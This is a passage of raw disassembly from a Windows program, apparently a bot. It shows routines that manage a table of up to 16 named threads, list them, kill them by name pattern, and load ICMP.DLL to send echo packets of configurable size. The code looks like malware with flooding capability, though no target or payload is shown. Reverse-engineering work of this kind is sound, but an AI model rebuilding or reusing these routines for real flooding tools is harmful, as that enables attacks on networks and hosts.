var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
call dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_409381
jg short loc_409340
cmp [ebp+var_8], 0
jbe short loc_409381
loc_409340: ; CODE XREF: sub_409318+20�j
cmp [ebp+var_C], 0
jl short loc_409381
jg short loc_40934E
cmp [ebp+var_10], 0
jbe short loc_409381
loc_40934E: ; CODE XREF: sub_409318+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
sub eax, dword_41E2A0
jmp short locret_40938D
; ---------------------------------------------------------------------------
loc_409381: ; CODE XREF: sub_409318+1E�j
; sub_409318+26�j ...
call dword_4170D0 ; GetTickCount
sub eax, dword_41E2A0
locret_40938D: ; CODE XREF: sub_409318+67�j
leave
retn
sub_409318 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40938F proc near ; CODE XREF: sub_4167F1+D5�p
push ebp
mov ebp, esp
and dword_41E2C0, 0
push 1980h
call sub_416B46 ; malloc
pop ecx
mov dword_41E2C8, eax
push offset dword_41E2A8
call sub_409C36
pop ecx
pop ebp
retn
sub_40938F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4093B6 proc near ; DATA XREF: sub_409479+35�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417278
push offset sub_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_20], 0
and [ebp+var_1C], 0
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [ebp+var_20], eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov [ebp+var_1C], eax
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push [ebp+var_20]
call dword_4170DC ; IsBadCodePtr
test eax, eax
jz short loc_409431
cmp dword_41DE08, 0
jz short loc_40942F
push [ebp+var_20]
push offset dword_419474
push offset dword_41DA80
call sub_40D4AB
add esp, 0Ch
loc_40942F: ; CODE XREF: sub_4093B6+62�j
jmp short loc_409443
; ---------------------------------------------------------------------------
loc_409431: ; CODE XREF: sub_4093B6+59�j
push [ebp+var_1C]
call [ebp+var_20]
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_24]
jmp short loc_409468
; ---------------------------------------------------------------------------
loc_409443: ; CODE XREF: sub_4093B6:loc_40942F�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_409466
; ---------------------------------------------------------------------------
push offset aBtg ; "btg"
push offset aThread ; "thread"
push [ebp+var_14]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_409466: ; CODE XREF: sub_4093B6+91�j
xor eax, eax
loc_409468: ; CODE XREF: sub_4093B6+8B�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_4093B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409479 proc near ; CODE XREF: sub_40764D+14A�p
; sub_409BF1+2F�p ...
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push 8
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_409494
xor eax, eax
jmp short locret_4094E4
; ---------------------------------------------------------------------------
loc_409494: ; CODE XREF: sub_409479+15�j
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
lea eax, [ebp+var_8]
push eax
push 0
push [ebp+var_C]
push offset sub_4093B6
push 20000h
push 0
call sub_416DC0 ; _beginthreadex
add esp, 18h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4094D9
push [ebp+var_4]
call dword_4170A4 ; CloseHandle
push 1
pop eax
jmp short locret_4094E4
; ---------------------------------------------------------------------------
loc_4094D9: ; CODE XREF: sub_409479+50�j
push [ebp+var_C]
call sub_416B4C ; free
pop ecx
xor eax, eax
locret_4094E4: ; CODE XREF: sub_409479+19�j
; sub_409479+5E�j
leave
retn
sub_409479 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4094E6 proc near ; DATA XREF: sub_4095A4+159�o
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_19B = byte ptr -19Bh
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417288
push offset sub_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov al, byte_41DE00
mov [ebp+var_19C], al
push 60h
pop ecx
xor eax, eax
lea edi, [ebp+var_19B]
rep stosd
stosw
stosb
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax+10h]
mov [ebp+var_1A0], eax
mov eax, [ebp+arg_0]
mov eax, [eax]
add eax, 14h
push eax
lea eax, [ebp+var_19C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push [ebp+arg_0]
mov eax, [ebp+arg_0]
mov eax, [eax]
call dword ptr [eax+10h]
mov [ebp+var_1A4], eax
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_1A4]
jmp short loc_409593
; ---------------------------------------------------------------------------
lea eax, [ebp+var_19C]
push eax
push offset aThread ; "thread"
push [ebp+var_14]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
xor eax, eax
loc_409593: ; CODE XREF: sub_4094E6+8A�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_4094E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4095A4 proc near ; CODE XREF: sub_4017AA+A2�p
; sub_401D6E+8D�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
push offset dword_41E2A8
call sub_409C6C
pop ecx
cmp dword_41E2C0, 10h
jnz short loc_4095D9
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E2A8
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_4095D9: ; CODE XREF: sub_4095A4+18�j
cmp [ebp+arg_8], 0
jz short loc_409627
and [ebp+var_10], 0
jmp short loc_4095EC
; ---------------------------------------------------------------------------
loc_4095E5: ; CODE XREF: sub_4095A4:loc_409625�j
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_4095EC: ; CODE XREF: sub_4095A4+3F�j
cmp [ebp+var_10], 10h
jge short loc_409627
mov eax, [ebp+var_10]
imul eax, 198h
mov ecx, dword_41E2C8
mov eax, [ecx+eax+10h]
cmp eax, [ebp+arg_0]
jnz short loc_409625
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E2A8
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_409625: ; CODE XREF: sub_4095A4+64�j
jmp short loc_4095E5
; ---------------------------------------------------------------------------
loc_409627: ; CODE XREF: sub_4095A4+39�j
; sub_4095A4+4C�j
and [ebp+var_C], 0
and [ebp+var_8], 0
jmp short loc_409638
; ---------------------------------------------------------------------------
loc_409631: ; CODE XREF: sub_4095A4:loc_409672�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_409638: ; CODE XREF: sub_4095A4+8B�j
cmp [ebp+var_8], 10h
jge short loc_409674
mov eax, [ebp+var_8]
imul eax, 198h
mov ecx, dword_41E2C8
cmp dword ptr [ecx+eax+8], 0
jnz short loc_409672
mov eax, [ebp+var_8]
imul eax, 198h
mov ecx, dword_41E2C8
add ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
jmp short loc_409674
; ---------------------------------------------------------------------------
loc_409672: ; CODE XREF: sub_4095A4+AE�j
jmp short loc_409631
; ---------------------------------------------------------------------------
loc_409674: ; CODE XREF: sub_4095A4+98�j
; sub_4095A4+CC�j
cmp [ebp+var_C], 0
jnz short loc_409695
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E2A8
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_409695: ; CODE XREF: sub_4095A4+D4�j
cmp [ebp+arg_4], 0
jz short loc_4096A3
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
mov [eax], ecx
loc_4096A3: ; CODE XREF: sub_4095A4+F5�j
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [eax+10h], ecx
lea eax, [ebp+arg_10]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_C]
mov eax, [ebp+var_C]
add eax, 14h
push eax
call sub_416DC6 ; vsprintf
add esp, 0Ch
and [ebp+var_4], 0
mov eax, [ebp+var_C]
and dword ptr [eax+4], 0
mov eax, dword_41E2C0
inc eax
mov dword_41E2C0, eax
cmp [ebp+arg_4], 0
jz short loc_4096EB
mov eax, [ebp+arg_4]
mov [ebp+var_14], eax
jmp short loc_4096F1
; ---------------------------------------------------------------------------
loc_4096EB: ; CODE XREF: sub_4095A4+13D�j
mov eax, [ebp+var_C]
mov [ebp+var_14], eax
loc_4096F1: ; CODE XREF: sub_4095A4+145�j
mov eax, [ebp+var_C]
add eax, 0Ch
push eax
push 0
push [ebp+var_14]
push offset sub_4094E6
push 0
push 0
call sub_416DC0 ; _beginthreadex
add esp, 18h
mov ecx, [ebp+var_C]
mov [ecx+8], eax
mov eax, [ebp+var_C]
cmp dword ptr [eax+8], 0
jnz short loc_409753
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
mov eax, dword_41E2C0
dec eax
mov dword_41E2C0, eax
push 198h
push 0
lea eax, [ebp+var_C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push offset dword_41E2A8
call sub_409C7A
pop ecx
xor eax, eax
jmp short locret_409761
; ---------------------------------------------------------------------------
loc_409753: ; CODE XREF: sub_4095A4+177�j
push offset dword_41E2A8
call sub_409C7A
pop ecx
push 1
pop eax
locret_409761: ; CODE XREF: sub_4095A4+30�j
; sub_4095A4+7C�j ...
leave
retn
sub_4095A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409763 proc near ; CODE XREF: sub_401244+73�p
; sub_401244+547�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push offset dword_41E2A8
call sub_409C6C
pop ecx
mov eax, dword_41E2C0
dec eax
mov dword_41E2C0, eax
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
call dword_4170A4 ; CloseHandle
push 198h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
push offset dword_41E2A8
call sub_409C7A
pop ecx
pop ebp
retn
sub_409763 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4097A7 proc near ; CODE XREF: sub_40A9CF+EBF�p
var_194 = dword ptr -194h
var_190 = byte ptr -190h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 194h
cmp [ebp+arg_0], 0
jnz short loc_4097BB
jmp locret_4098F1
; ---------------------------------------------------------------------------
loc_4097BB: ; CODE XREF: sub_4097A7+D�j
push [ebp+arg_0]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_409825
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
push offset dword_41E2A8
call sub_409C6C
pop ecx
cmp [ebp+var_4], 10h
jnb short loc_409815
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2C8
cmp dword ptr [ecx+eax+8], 0
jz short loc_409815
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2C8
mov dword ptr [ecx+eax+4], 1
loc_409815: ; CODE XREF: sub_4097A7+3F�j
; sub_4097A7+55�j
push offset dword_41E2A8
call sub_409C7A
pop ecx
jmp locret_4098F1
; ---------------------------------------------------------------------------
loc_409825: ; CODE XREF: sub_4097A7+22�j
push [ebp+arg_0]
push offset aS ; "*%s*"
push 185h
lea eax, [ebp+var_190]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset dword_41E2A8
call sub_409C6C
pop ecx
mov eax, dword_41E2C0
mov [ebp+var_8], eax
and [ebp+var_194], 0
jmp short loc_40986A
; ---------------------------------------------------------------------------
loc_40985D: ; CODE XREF: sub_4097A7:loc_4098E1�j
mov eax, [ebp+var_194]
inc eax
mov [ebp+var_194], eax
loc_40986A: ; CODE XREF: sub_4097A7+B4�j
cmp [ebp+var_194], 10h
jnb short loc_4098E6
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, dword_41E2C8
cmp dword ptr [ecx+eax+8], 0
jz short loc_4098E1
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
lea eax, [ebp+var_190]
push eax
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, dword_41E2C8
lea eax, [ecx+eax+14h]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_4098D9
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, dword_41E2C8
mov dword ptr [ecx+eax+4], 1
loc_4098D9: ; CODE XREF: sub_4097A7+116�j
cmp [ebp+var_8], 0
jnz short loc_4098E1
jmp short loc_4098E6
; ---------------------------------------------------------------------------
loc_4098E1: ; CODE XREF: sub_4097A7+E3�j
; sub_4097A7+136�j
jmp loc_40985D
; ---------------------------------------------------------------------------
loc_4098E6: ; CODE XREF: sub_4097A7+CA�j
; sub_4097A7+138�j
push offset dword_41E2A8
call sub_409C7A
pop ecx
locret_4098F1: ; CODE XREF: sub_4097A7+F�j
; sub_4097A7+79�j
leave
retn
sub_4097A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4098F3 proc near ; CODE XREF: sub_40A9CF+F13�p
var_19C = dword ptr -19Ch
var_198 = dword ptr -198h
var_194 = byte ptr -194h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 19Ch
cmp [ebp+arg_0], 0
jnz short loc_409907
jmp locret_409AD3
; ---------------------------------------------------------------------------
loc_409907: ; CODE XREF: sub_4098F3+D�j
push [ebp+arg_0]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz loc_4099B4
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
push offset dword_41E2A8
call sub_409C6C
pop ecx
cmp [ebp+var_4], 10h
jnb short loc_4099A4
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2C8
cmp dword ptr [ecx+eax+8], 0
jz short loc_4099A4
mov eax, dword_41E2C0
dec eax
mov dword_41E2C0, eax
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2C8
mov eax, [ecx+eax+8]
mov [ebp+var_8], eax
push 198h
push 0
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2C8
add ecx, eax
push ecx
call sub_416B6A ; memset
add esp, 0Ch
push 0
push [ebp+var_8]
call dword_4170E0 ; TerminateThread
push [ebp+var_8]
call dword_4170A4 ; CloseHandle
loc_4099A4: ; CODE XREF: sub_4098F3+43�j
; sub_4098F3+59�j
push offset dword_41E2A8
call sub_409C7A
pop ecx
jmp locret_409AD3
; ---------------------------------------------------------------------------
loc_4099B4: ; CODE XREF: sub_4098F3+22�j
push [ebp+arg_0]
push offset aS ; "*%s*"
push 185h
lea eax, [ebp+var_194]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset dword_41E2A8
call sub_409C6C
pop ecx
mov eax, dword_41E2C0
mov [ebp+var_C], eax
and [ebp+var_198], 0
jmp short loc_4099F9
; ---------------------------------------------------------------------------
loc_4099EC: ; CODE XREF: sub_4098F3:loc_409AC3�j
mov eax, [ebp+var_198]
inc eax
mov [ebp+var_198], eax
loc_4099F9: ; CODE XREF: sub_4098F3+F7�j
cmp [ebp+var_198], 10h
jnb loc_409AC8
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, dword_41E2C8
cmp dword ptr [ecx+eax+8], 0
jz loc_409AC3
mov eax, [ebp+var_C]
dec eax
mov [ebp+var_C], eax
lea eax, [ebp+var_194]
push eax
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, dword_41E2C8
lea eax, [ecx+eax+14h]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_409ABB
mov eax, dword_41E2C0
dec eax
mov dword_41E2C0, eax
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, dword_41E2C8
mov eax, [ecx+eax+8]
mov [ebp+var_19C], eax
push 198h
push 0
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, dword_41E2C8
add ecx, eax
push ecx
call sub_416B6A ; memset
add esp, 0Ch
push 0
push [ebp+var_19C]
call dword_4170E0 ; TerminateThread
push [ebp+var_19C]
call dword_4170A4 ; CloseHandle
loc_409ABB: ; CODE XREF: sub_4098F3+161�j
cmp [ebp+var_C], 0
jnz short loc_409AC3
jmp short loc_409AC8
; ---------------------------------------------------------------------------
loc_409AC3: ; CODE XREF: sub_4098F3+12A�j
; sub_4098F3+1CC�j
jmp loc_4099EC
; ---------------------------------------------------------------------------
loc_409AC8: ; CODE XREF: sub_4098F3+10D�j
; sub_4098F3+1CE�j
push offset dword_41E2A8
call sub_409C7A
pop ecx
locret_409AD3: ; CODE XREF: sub_4098F3+F�j
; sub_4098F3+BC�j
leave
retn
sub_4098F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409AD5 proc near ; DATA XREF: sub_409BF1+2A�o
var_1A8 = byte ptr -1A8h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A8h
push 1A3h
push [ebp+arg_0]
lea eax, [ebp+var_1A8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
cmp dword_41E2C0, 0
jz short loc_409B25
push 10h
push dword_41E2C0
push offset dword_4194EC
lea eax, [ebp+var_1A8]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_409B3F
; ---------------------------------------------------------------------------
loc_409B25: ; CODE XREF: sub_409AD5+30�j
push offset dword_4194CC
lea eax, [ebp+var_1A8]
push eax
call sub_40D53F
pop ecx
pop ecx
xor eax, eax
jmp locret_409BED
; ---------------------------------------------------------------------------
loc_409B3F: ; CODE XREF: sub_409AD5+4E�j
push offset dword_41E2A8
call sub_409C6C
pop ecx
and [ebp+var_10], 0
and [ebp+var_4], 0
jmp short loc_409B5B
; ---------------------------------------------------------------------------
loc_409B54: ; CODE XREF: sub_409AD5:loc_409BDB�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_409B5B: ; CODE XREF: sub_409AD5+7D�j
cmp [ebp+var_4], 10h
jge short loc_409BE0
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2C8
cmp dword ptr [ecx+eax+8], 0
jz short loc_409BDB
push offset dword_41E2A8
call sub_409C7A
pop ecx
push 3E8h
call dword_41709C ; Sleep
push offset dword_41E2A8
call sub_409C6C
pop ecx
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2C8
lea eax, [ecx+eax+14h]
push eax
push [ebp+var_4]
push offset dword_4194BC
lea eax, [ebp+var_1A8]
push eax
call sub_40D53F
add esp, 10h
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E2C8
cmp dword ptr [ecx+eax+4], 0
jz short loc_409BDB
jmp short loc_409BE0
; ---------------------------------------------------------------------------
loc_409BDB: ; CODE XREF: sub_409AD5+A0�j
; sub_409AD5+102�j
jmp loc_409B54
; ---------------------------------------------------------------------------
loc_409BE0: ; CODE XREF: sub_409AD5+8A�j
; sub_409AD5+104�j
push offset dword_41E2A8
call sub_409C7A
pop ecx
xor eax, eax
locret_409BED: ; CODE XREF: sub_409AD5+65�j
leave
retn 4
sub_409AD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409BF1 proc near ; CODE XREF: sub_40A9CF+AFB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A3h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_409C0B
jmp short locret_409C34
; ---------------------------------------------------------------------------
loc_409C0B: ; CODE XREF: sub_409BF1+16�j
push [ebp+arg_0]
push [ebp+var_4]
call sub_405F67
pop ecx
pop ecx
push [ebp+arg_0]
push offset sub_409AD5
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short locret_409C34
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
locret_409C34: ; CODE XREF: sub_409BF1+18�j
; sub_409BF1+38�j
leave
retn
sub_409BF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C36 proc near ; CODE XREF: sub_405FA3+9�p
; sub_40938F+1F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 18h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
cmp dword_41DE10, 0
jz short loc_409C61
push 80000400h
push [ebp+arg_0]
call dword_41DE10 ; InitializeCriticalSectionAndSpinCount
jmp short loc_409C6A
; ---------------------------------------------------------------------------
loc_409C61: ; CODE XREF: sub_409C36+19�j
push [ebp+arg_0]
call dword_4170E4 ; InitializeCriticalSection
loc_409C6A: ; CODE XREF: sub_409C36+29�j
pop ebp
retn
sub_409C36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C6C proc near ; CODE XREF: sub_406041+10�p
; sub_4095A4+B�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call dword_4170EC ; RtlEnterCriticalSection
pop ebp
retn
sub_409C6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C7A proc near ; CODE XREF: sub_406041+26�p
; sub_406041+307�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call dword_41710C ; RtlLeaveCriticalSection
pop ebp
retn
sub_409C7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C88 proc near ; CODE XREF: sub_40332B+10�p
; sub_41113B+7ED�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
lock xadd [esi], eax
pop edi
pop esi
pop ebx
pop ebp
retn
sub_409C88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C9D proc near ; CODE XREF: sub_4042FB+17�p
; sub_4042FB+25�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
lock xchg eax, [esi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_409C9D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409CB1 proc near ; CODE XREF: sub_409DD0+202�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 38h
call dword_41E2CC
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_409CD8
push offset aCouldNotGetAVa ; "Could not get a valid ICMP handle\n"
call sub_416DD8 ; printf
pop ecx
xor eax, eax
jmp locret_409DCE
; ---------------------------------------------------------------------------
loc_409CD8: ; CODE XREF: sub_409CB1+13�j
push 8
push 0
lea eax, [ebp+var_18]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov al, [ebp+arg_8]
mov [ebp+var_18], al
movzx eax, [ebp+arg_10]
push eax
call sub_416DD2
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov [ebp+var_C], eax
movzx eax, [ebp+arg_10]
push eax
push 45h
push [ebp+var_C]
call sub_416B6A ; memset
add esp, 0Ch
movzx eax, [ebp+arg_10]
cmp eax, 8
jge short loc_409D26
mov [ebp+var_38], 8
jmp short loc_409D2D
; ---------------------------------------------------------------------------
loc_409D26: ; CODE XREF: sub_409CB1+6A�j
movzx eax, [ebp+arg_10]
mov [ebp+var_38], eax
loc_409D2D: ; CODE XREF: sub_409CB1+73�j
mov eax, [ebp+var_38]
add eax, 1Ch
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_416DD2
pop ecx
mov [ebp+var_2C], eax
mov eax, [ebp+var_2C]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_4], eax
push [ebp+arg_C]
push [ebp+var_24]
push [ebp+var_10]
lea eax, [ebp+var_18]
push eax
movzx ax, [ebp+arg_10]
push eax
push [ebp+var_C]
push [ebp+arg_0]
push [ebp+var_1C]
call dword_41E2D8
mov [ebp+var_20], eax
mov [ebp+var_8], 1
cmp [ebp+var_20], 1
jz short loc_409D8D
call dword_417064 ; RtlGetLastWin32Error
mov ecx, [ebp+arg_4]
mov [ecx], eax
jmp short loc_409DA4
; ---------------------------------------------------------------------------
loc_409D8D: ; CODE XREF: sub_409CB1+CD�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov ecx, [ecx]
mov [eax+4], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov ecx, [ecx+8]
mov [eax+8], ecx
loc_409DA4: ; CODE XREF: sub_409CB1+DA�j
push [ebp+var_1C]
call dword_41E2D4
mov eax, [ebp+var_C]
mov [ebp+var_30], eax
push [ebp+var_30]
call sub_416DCC
pop ecx
mov eax, [ebp+var_10]
mov [ebp+var_34], eax
push [ebp+var_34]
call sub_416DCC
pop ecx
mov eax, [ebp+var_8]
locret_409DCE: ; CODE XREF: sub_409CB1+22�j
leave
retn
sub_409CB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409DD0 proc near ; DATA XREF: sub_40A1A7+FD�o
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = byte ptr -2B0h
var_10D = byte ptr -10Dh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2F0h
push 2ACh
push [ebp+arg_0]
lea eax, [ebp+var_2B0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
movzx eax, byte_41E2E0
test eax, eax
jnz short loc_409E6D
push offset aIcmp_dll ; "ICMP.DLL"
call dword_417054 ; LoadLibraryA
mov dword_41E2D0, eax
cmp dword_41E2D0, 0
jnz short loc_409E24
xor eax, eax
jmp locret_40A1A3
; ---------------------------------------------------------------------------
loc_409E24: ; CODE XREF: sub_409DD0+4B�j
push offset aIcmpcreatefile ; "IcmpCreateFile"
push dword_41E2D0
call dword_417058 ; GetProcAddress
mov dword_41E2CC, eax
push offset aIcmpsendecho ; "IcmpSendEcho"
push dword_41E2D0
call dword_417058 ; GetProcAddress
